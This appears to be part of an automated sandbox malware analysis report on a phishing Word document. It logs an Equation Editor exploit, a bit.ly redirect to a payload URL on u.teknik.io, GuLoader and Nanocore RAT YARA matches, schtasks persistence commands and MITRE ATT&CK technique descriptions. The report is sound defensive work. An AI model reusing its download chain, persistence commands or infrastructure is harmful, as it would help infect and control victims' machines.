Feb 24, 2021 07:58:06.229305029 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.229310989 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.229321003 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.229345083 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.229370117 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.229398012 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.230669975 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.280603886 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.280636072 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.280723095 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.280862093 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.280915022 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.280957937 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.281013012 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.281100035 CET	443	49166	5.79.72.163	192.168.2.22
Feb 24, 2021 07:58:06.281150103 CET	49166	443	192.168.2.22	5.79.72.163
Feb 24, 2021 07:58:06.281160116 CET	443	49166	5.79.72.163	192.168.2.22

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 24, 2021 07:58:03.413405895 CET	52197	53	192.168.2.22	8.8.8.8
Feb 24, 2021 07:58:03.462511063 CET	53	52197	8.8.8.8	192.168.2.22
Feb 24, 2021 07:58:03.462815046 CET	52197	53	192.168.2.22	8.8.8.8
Feb 24, 2021 07:58:03.511917114 CET	53	52197	8.8.8.8	192.168.2.22
Feb 24, 2021 07:58:03.784756899 CET	53099	53	192.168.2.22	8.8.8.8
Feb 24, 2021 07:58:03.849397898 CET	53	53099	8.8.8.8	192.168.2.22
Feb 24, 2021 07:58:03.849713087 CET	53099	53	192.168.2.22	8.8.8.8
Feb 24, 2021 07:58:03.920074940 CET	53	53099	8.8.8.8	192.168.2.22
Feb 24, 2021 07:58:04.387250900 CET	52838	53	192.168.2.22	8.8.8.8
Feb 24, 2021 07:58:04.437798023 CET	53	52838	8.8.8.8	192.168.2.22
Feb 24, 2021 07:58:04.440893888 CET	61200	53	192.168.2.22	8.8.8.8
Feb 24, 2021 07:58:04.494389057 CET	53	61200	8.8.8.8	192.168.2.22
Feb 24, 2021 07:58:05.008219957 CET	49548	53	192.168.2.22	8.8.8.8
Feb 24, 2021 07:58:05.071787119 CET	53	49548	8.8.8.8	192.168.2.22
Feb 24, 2021 07:58:05.074932098 CET	55627	53	192.168.2.22	8.8.8.8
Feb 24, 2021 07:58:05.132577896 CET	53	55627	8.8.8.8	192.168.2.22
Feb 24, 2021 07:59:34.796936989 CET	56009	53	192.168.2.22	8.8.8.8
Feb 24, 2021 07:59:34.848627090 CET	53	56009	8.8.8.8	192.168.2.22
Feb 24, 2021 07:59:36.092518091 CET	61865	53	192.168.2.22	8.8.8.8
Feb 24, 2021 07:59:36.188860893 CET	53	61865	8.8.8.8	192.168.2.22

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 24, 2021 07:58:03.413405895 CET	192.168.2.22	8.8.8.8	0xd372	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Feb 24, 2021 07:58:03.462815046 CET	192.168.2.22	8.8.8.8	0xd372	Standard query (0)	bit.ly	A (IP address)	IN (0x0001)
Feb 24, 2021 07:58:03.784756899 CET	192.168.2.22	8.8.8.8	0x7032	Standard query (0)	u.teknik.io	A (IP address)	IN (0x0001)
Feb 24, 2021 07:58:03.849713087 CET	192.168.2.22	8.8.8.8	0x7032	Standard query (0)	u.teknik.io	A (IP address)	IN (0x0001)
Feb 24, 2021 07:59:34.796936989 CET	192.168.2.22	8.8.8.8	0xfad2	Standard query (0)	onedrive.live.com	A (IP address)	IN (0x0001)
Feb 24, 2021 07:59:36.092518091 CET	192.168.2.22	8.8.8.8	0x8eb3	Standard query (0)	cbavwq.bl.files.1drv.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 24, 2021 07:58:03.462511063 CET	8.8.8.8	192.168.2.22	0xd372	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Feb 24, 2021 07:58:03.462511063 CET	8.8.8.8	192.168.2.22	0xd372	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)
Feb 24, 2021 07:58:03.511917114 CET	8.8.8.8	192.168.2.22	0xd372	No error (0)	bit.ly		67.199.248.10	A (IP address)	IN (0x0001)
Feb 24, 2021 07:58:03.511917114 CET	8.8.8.8	192.168.2.22	0xd372	No error (0)	bit.ly		67.199.248.11	A (IP address)	IN (0x0001)
Feb 24, 2021 07:58:03.849397898 CET	8.8.8.8	192.168.2.22	0x7032	No error (0)	u.teknik.io	teknik.io		CNAME (Canonical name)	IN (0x0001)
Feb 24, 2021 07:58:03.849397898 CET	8.8.8.8	192.168.2.22	0x7032	No error (0)	teknik.io		5.79.72.163	A (IP address)	IN (0x0001)
Feb 24, 2021 07:58:03.920074940 CET	8.8.8.8	192.168.2.22	0x7032	No error (0)	u.teknik.io	teknik.io		CNAME (Canonical name)	IN (0x0001)
Feb 24, 2021 07:58:03.920074940 CET	8.8.8.8	192.168.2.22	0x7032	No error (0)	teknik.io		5.79.72.163	A (IP address)	IN (0x0001)
Feb 24, 2021 07:59:34.848627090 CET	8.8.8.8	192.168.2.22	0xfad2	No error (0)	onedrive.live.com	odc-web-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)
Feb 24, 2021 07:59:36.188860893 CET	8.8.8.8	192.168.2.22	0x8eb3	No error (0)	cbavwq.bl.files.1drv.com	bl-files.fe.1drv.com		CNAME (Canonical name)	IN (0x0001)
Feb 24, 2021 07:59:36.188860893 CET	8.8.8.8	192.168.2.22	0x8eb3	No error (0)	bl-files.fe.1drv.com	odc-bl-files-geo.onedrive.akadns.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

bit.ly

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.22	49165	67.199.248.10	80	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Timestamp	kBytes transferred	Direction	Data
Feb 24, 2021 07:58:03.581068039 CET	0	OUT	GET /3pNzHgj HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E) Host: bit.ly Connection: Keep-Alive
Feb 24, 2021 07:58:03.725155115 CET	1	IN	HTTP/1.1 301 Moved Permanently Server: nginx Date: Wed, 24 Feb 2021 06:58:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 116 Cache-Control: private, max-age=90 Location: https://u.teknik.io/TFppy.txt Set-Cookie: _bit=l1o6W3-c81e1a3d057d34d143-001; Domain=bit.ly; Expires=Mon, 23 Aug 2021 06:58:03 GMT Via: 1.1 google Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 42 69 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 2e 74 65 6b 6e 69 6b 2e 69 6f 2f 54 46 70 70 79 2e 74 78 74 22 3e 6d 6f 76 65 64 20 68 65 72 65 3c 2f 61 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>Bitly</title></head><body><a href="https://u.teknik.io/TFppy.txt">moved here</a></body></html>

Code Manipulations

Statistics

Behavior

Click to jump to process

System Behavior

Analysis Process: WINWORD.EXE PID: 252 Parent PID: 584

General

Start time:	07:57:31
Start date:	24/02/2021
Path:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
Wow64 process (32bit):	false
Commandline:	'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Imagebase:	0x13f0b0000
File size:	1424032 bytes
MD5 hash:	95C38D04597050285A18F66039EDB456
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: EQNEDT32.EXE PID: 1204 Parent PID: 584

General

Start time:	07:57:32
Start date:	24/02/2021
Path:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Wow64 process (32bit):	true
Commandline:	'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Imagebase:	0x400000
File size:	543304 bytes
MD5 hash:	A87236E214F6D42A65F5DEDAC816AEC8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: 69577.exe PID: 896 Parent PID: 1204

General

Start time:	07:57:36
Start date:	24/02/2021
Path:	C:\Users\Public\69577.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	ACFCBD916FA04787E4388B339592DD78
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Analysis Process: RegAsm.exe PID: 2428 Parent PID: 896

General

Start time:	07:58:56
Start date:	24/02/2021
Path:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\Public\69577.exe
Imagebase:	0x370000
File size:	53248 bytes
MD5 hash:	246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_GuLoader, Description: Yara detected GuLoader, Source: 00000005.00000002.2342821040.0000000000562000.00000040.00000001.sdmp, Author: Joe Security Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2342294404.0000000000080000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2342294404.0000000000080000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp, Author: Florian Roth Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000005.00000002.2342304047.0000000000090000.00000004.00000001.sdmp, Author: Joe Security
Reputation:	moderate

Analysis Process: schtasks.exe PID: 2988 Parent PID: 2428

General

Start time:	07:59:07
Start date:	24/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp1A35.tmp'
Imagebase:	0xf0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: schtasks.exe PID: 2980 Parent PID: 2428

General

Start time:	07:59:08
Start date:	24/02/2021
Path:	C:\Windows\SysWOW64\schtasks.exe
Wow64 process (32bit):	true
Commandline:	'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp678.tmp'
Imagebase:	0xf0000
File size:	179712 bytes
MD5 hash:	2003E9B15E1C502B146DAD2E383AC1E3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Analysis Process: taskeng.exe PID: 1688 Parent PID: 860

General

Start time:	07:59:09
Start date:	24/02/2021
Path:	C:\Windows\System32\taskeng.exe
Wow64 process (32bit):	false
Commandline:	taskeng.exe {DA6299CA-95CA-4E9D-8945-2CC05321254C} S-1-5-21-966771315-3019405637-367336477-1006:user-PC\user:Interactive:[1]
Imagebase:	0xff3b0000
File size:	464384 bytes
MD5 hash:	65EA57712340C09B1B0C427B4848AE05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate

Analysis Process: smtpsvc.exe PID: 2380 Parent PID: 1688

General

Start time:	07:59:09
Start date:	24/02/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
Imagebase:	0x1280000
File size:	53248 bytes
MD5 hash:	246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Antivirus matches:	Detection: 0%, Virustotal, Browse Detection: 0%, Metadefender, Browse Detection: 0%, ReversingLabs
Reputation:	moderate

Analysis Process: filename1.exe PID: 2152 Parent PID: 1388

General

Start time:	07:59:15
Start date:	24/02/2021
Path:	C:\Users\user\subfolder1\filename1.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\subfolder1\filename1.exe'
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	ACFCBD916FA04787E4388B339592DD78
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Analysis Process: smtpsvc.exe PID: 2500 Parent PID: 1388

General

Start time:	07:59:23
Start date:	24/02/2021
Path:	C:\Program Files (x86)\SMTP Service\smtpsvc.exe
Wow64 process (32bit):	true
Commandline:	'C:\Program Files (x86)\SMTP Service\smtpsvc.exe'
Imagebase:	0x270000
File size:	53248 bytes
MD5 hash:	246BB0F8D68A463FD17C235DEB5491C0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	moderate

Analysis Process: filename1.exe PID: 1480 Parent PID: 1388

General

Start time:	07:59:32
Start date:	24/02/2021
Path:	C:\Users\user\subfolder1\filename1.exe
Wow64 process (32bit):	true
Commandline:	'C:\Users\user\subfolder1\filename1.exe'
Imagebase:	0x400000
File size:	131072 bytes
MD5 hash:	ACFCBD916FA04787E4388B339592DD78
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Visual Basic
Reputation:	low

Disassembly

Code Analysis

Reset < >

Description:	Adversaries may send spearphishing emails with a malicious link in an attempt to elicit sensitive information and/or gain access to victim systems. Spearphishing with a link is a specific variant of spearphishing. It is different from other forms of spearphishing in that it employs the use of links to download malware contained in email, instead of attaching malicious files to the email itself, to avoid defenses that may inspect email attachments.
Tactics:	Initial Access
Data Sources:	DNS records, Detonation chamber, Email gateway, Mail server, Packet capture, SSL/TLS inspection, Web proxy
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches ( `dir /a` for Windows and `ls –a` for Linux and macOS).
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report PO AAN2102002-V020.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Exploits:

Compliance:

Spreading:

Software Vulnerabilities:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static RTF Info

Objects

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port paring that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks. These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment. Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries.
Tactics:	Command and Control
Data Sources:	Network intrusion detection system, Network protocol analysis, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre